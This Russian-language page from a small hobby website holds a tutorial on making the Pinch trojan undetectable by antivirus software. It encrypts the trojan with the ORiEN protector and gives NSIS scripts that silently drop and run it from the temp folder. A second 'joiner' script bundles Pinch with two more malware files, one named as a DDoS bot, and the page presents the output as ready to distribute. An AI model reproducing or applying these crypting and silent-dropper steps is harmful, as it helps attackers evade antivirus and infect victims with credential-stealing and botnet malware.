Приветствую Вас на своем сайте!
Главная Форум Полезные файлы Музыка Cофт Профиль Фото галерея Выход Вход
  Менюшка

  Мини-чат

  Cыграйка

  Бонус wmr


Получите WMR-бонус
от 0,01 до 0,20 WMR на свой кошелек!

  Проголосуй

Любите ли вы Новый год?
Всего ответов: 8

Рассмотрим скрытие от антивирусов трояна Pinch, как наиболее часто применяемого на территории бывшего СССР да и не только.
Из подручных средств нам понадобится протектор ORiEN и система для создания инсталляторов Nullsoft Scriptable Install System. Выбор
именно этих средств обусловлен малым размером приклеиваемого стаба(что
сказывается довольно малым увеличением, а с учетом компрессии зачастую
и уменьшением размера криптованного файла по сравнению с исходным) и их
бесплатностью.
Итак, начнем.
Сначала скачаем и установим вышеупомянутые инструменты с их официальных сайтов:
ORiEN: http://zalexf.narod.ru/
Nullsoft Scriptable Install System: http://nsis.sourceforge.net/
Затем запустим протектор ORiEN
С помощью кнопки Обзор укажем путь к пинчу. Затем перейдем к вкладке Пароль
и установим его чтение из командной строки. Затем введем в первое поле
ввода любой пароль(главное не забыть его до конца процедуры
криптования) – им будет шифроваться наш троян. После ввода пароля
чекбокс наротив поля ввода станет активен – отметим его.
После этого станет активен другой чекбокс – Защита по паролю. Его тоже необходимо отметить. После выполнения этих операций нажимаем кнопку Старт.
Теперь желательно протестировать зашифрованный файл. Для этого просто
запускаем его и если появляется MsgBox с сообщением “Неверный пароль”,
то криптование прошло успешно.
Теперь можно переходить к следующему этапу – созданию инсталлятора с помощью Nullsoft Scriptable Install System(NSIS).
Создадим текстовый документ и вставим в него следующий код

<!--
. .
.



Код:


OutFile "crypted.exe" 

SilentInstall silent

Section "crypt"

SetOutPath "$TEMP"

SetOverwrite on

File "C:\Documents and Settings\adm\Рабочий стол\pinch.exe"

Execwait "$TEMP\pinch.exe !psw=123"

Delete $TEMP\pinch.exe

SectionEnd



<!--
.: .
.
Теперь необходимо немного отредактировать этот код.
В строке File "C:\DocumentsandSettings\gol\Рабочий стол\pinch. exe" должен находиться правильный путь к зашифрованному файлу, полученному с помощью протектора ORiEN на предыдущем этапе.
В строке Exec "$TEMP\pinch.exe !psw=123" после !psw= должен быть указан пароль, которым мы шифровали файл. Сохраним созданный текстовый файл.
Теперь запустим утилиту MakeNSISW соответствующим ярлыком из меню “Пуск”
Перетащим туда созданный текстовый файл. Если все сделано правильно, на
рабочем столе должен появиться файл crypt.exe, который можно спокойно
распространять.
Также NSIS может использоваться в качестве неплохого джойнера. Для этого в скрипте инсталлятора необходимо использовать директиву File и Exec вместо Execwait несколько раз.
Например чтобы склеить 3 файла, скрипт для NSIS будет выглядеть следующим образом:

<!--
. .
.



Код:


OutFile "joined.exe" 

SilentInstall silent

Section "file1"

SetOutPath "$TEMP"

SetOverwrite on

File "C:\Documents and Settings\adm\Рабочий стол\pinch.exe"

Exec $TEMP\pinch.exe

SectionEnd

Section "file2"

SetOutPath "$TEMP"

SetOverwrite on

File "C:\Documents and Settings\adm\Рабочий стол\wmtroj.exe"

Exec $TEMP\wmtroj.exe

SectionEnd

Section "file3"

SetOutPath "$TEMP"

SetOverwrite on

File "C:\Documents and Settings\adm\Рабочий стол\ddosbot.exe"

Exec $TEMP\ddosbot.exe

SectionEnd



<!--
.: .
.
Если будет необходимо удалить файлы после их запуска, то желательно использовать Execwait и Delete.

Теперь о размере закриптованного файла:
После конфигурирования паблик-пинча от Vaska он имел размер 50 кб в несжатом виде.
После криптования пинч стал весить 65 кб. По сравнению с криптованием протектором типа Themida, где пинч увеличивается в размере с 50 кб до 380 кб
описанный способ имеет неоспоримые преимущества. Увеличение объема
файла вполне соизмеримо с результатами работы приватными крипторами,
актуальные версии которых доступны далеко не всем.


  Личный кабинет

Привет: Зашедший

Сообщения:
$$$ для web-мастеров
Гость, мы рады вас видеть. Пожалуйста
зарегистрируйтесь или
авторизуйтесь!

  Календарь

«  Октябрь 2019  »
ПнВтСрЧтПтСбВс
 123456
78910111213
14151617181920
21222324252627
28293031

  Наши Друзья

Effectt.com - система обмена ссылками. обмен ссылками: добавить ссылку, прямые ссылки

Получить WMR-бонус на свой кошелек!
Linq.RU - Обмен ссылками
  Статистика сайта

Всего connect: 1
Зашедших: 1
Зареганых: 0

статистика Top 100: Развлечения, игры, юмор Бесплатная раскрутка сайта
Copyright Epidemic © 2019Используются технологии uCoz